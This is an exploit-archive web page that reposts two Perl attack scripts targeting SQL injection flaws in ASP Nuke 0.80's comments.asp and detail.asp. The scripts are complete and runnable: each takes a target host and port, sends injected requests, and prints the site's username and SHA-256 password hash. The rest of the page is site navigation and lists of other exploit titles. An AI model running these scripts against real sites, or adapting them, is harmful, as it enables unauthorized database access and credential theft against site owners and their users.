首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ASPNuke comments.asp and detail.asp Remote SQL Injection Exploit
来源:http://www.digitalparadox.org 作者:Diabolic 发布时间:2005-04-25  

ASPNuke "comments.asp" and "detail.asp" Remote SQL Injection Exploit

#!/usr/bin/perl

use IO::Socket;
use Getopt::Std;
print "[x]ASP NUKE 0.80 and below Comments.asp Sql Injection Exploit\n";
print "[x]By Diabolic Crab\n";
print "[x]http://www.digitalparadox.org\n\n";

getopt("h:p:");

$opt_p ||= 80;

if(!$opt_h) {
die("[x] Usage: $0 -h <host> [-p <port>]\n");
}

$sqlpass = "/module/support/task/comments.asp?taskid=Password-- HTTP/1.0\n";
$sqllogin = "/module/support/task/comments.asp?taskid=Username-- HTTP/1.0\n";

print "[x] Host: $opt_h\n";
print "[x] Port: $opt_p\n";

$Q1 = "GET $sqllogin";
$Q1 .= "Host: ".$opt_h."\n\n";

$Q2 = "GET $sqlpass";
$Q2 .= "Host: ".$opt_h."\n\n";

$s = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $opt_h, PeerPort => $opt_p)
or die("Can't connect!");
$s->send($Q1);
$s->recv($usr, 1024);

$s = IO::Socket::INET->new(Proto=>'tcp', PeerAddr => $opt_h, PeerPort => $opt_p)
or die("Can't connect!");
$s->send($Q2);
$s->recv($pass, 1024);

$s = index($usr,"'");
$e = index($usr,"'", $s + 1);
$f = $e - $s - 1;
print "[x]Username is: ";
print substr($usr, $s + 1, $f);
print "\n";

$s = index($pass,"'");
$e = index($pass,"'", $s + 1);
$f = $e - $s - 1;
print "[x]Password hash in SHA 256 is: ";
print substr($pass, $s + 1, $f);
print "\n";

----------------------------------------------------------------------------------------------------

#!/usr/bin/perl

use IO::Socket;
use Getopt::Std;
print "[x]ASP NUKE 0.80 and below Details.asp Sql Injection Exploit\n";
print "[x]By Diabolic Crab\n";
print "[x]http://www.digitalparadox.org\n\n";

getopt("h:p:");

$opt_p ||= 80;

if(!$opt_h) {
die("[x] Usage: $0 -h <host> [-p <port>]\n");
}

$sqlpass = "/module/support/task/detail.asp?taskid=Password-- HTTP/1.0\n";
$sqllogin = "/module/support/task/detail.asp?taskid=Username-- HTTP/1.0\n";

print "[x] Host: $opt_h\n";
print "[x] Port: $opt_p\n";

$Q1 = "GET $sqllogin";
$Q1 .= "Host: ".$opt_h."\n\n";

$Q2 = "GET $sqlpass";
$Q2 .= "Host: ".$opt_h."\n\n";

$s = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $opt_h, PeerPort => $opt_p)
or die("Can't connect!");
$s->send($Q1);
$s->recv($usr, 1024);

$s = IO::Socket::INET->new(Proto=>'tcp', PeerAddr => $opt_h, PeerPort => $opt_p)
or die("Can't connect!");
$s->send($Q2);
$s->recv($pass, 1024);

$s = index($usr,"'");
$e = index($usr,"'", $s + 1);
$f = $e - $s - 1;
print "[x]Username is: ";
print substr($usr, $s + 1, $f);
print "\n";

$s = index($pass,"'");
$e = index($pass,"'", $s + 1);
$f = $e - $s - 1;
print "[x]Password hash in SHA 256 is: ";
print substr($pass, $s + 1, $f);
print "\n";




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·phpBB Knowledge Base模块SQL注
·MSN Messenger PNG Image Buffer
·BitchX Buffer Overflow
·FOXmail POC exploit
·ICMP Attacks Against TCP Vulne
·Savant Web Server 3.1 Remote B
·Multiple Exploit Codes for Ora
·CA BrightStor ARCserve Backup
·PMsoftware Mini HTTP Server Re
·Exim 4.x 'spa_base64_to_bits()
·Multiple Vendor TCP/IP Impleme
·CA BrightStor ARCserve Backup
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved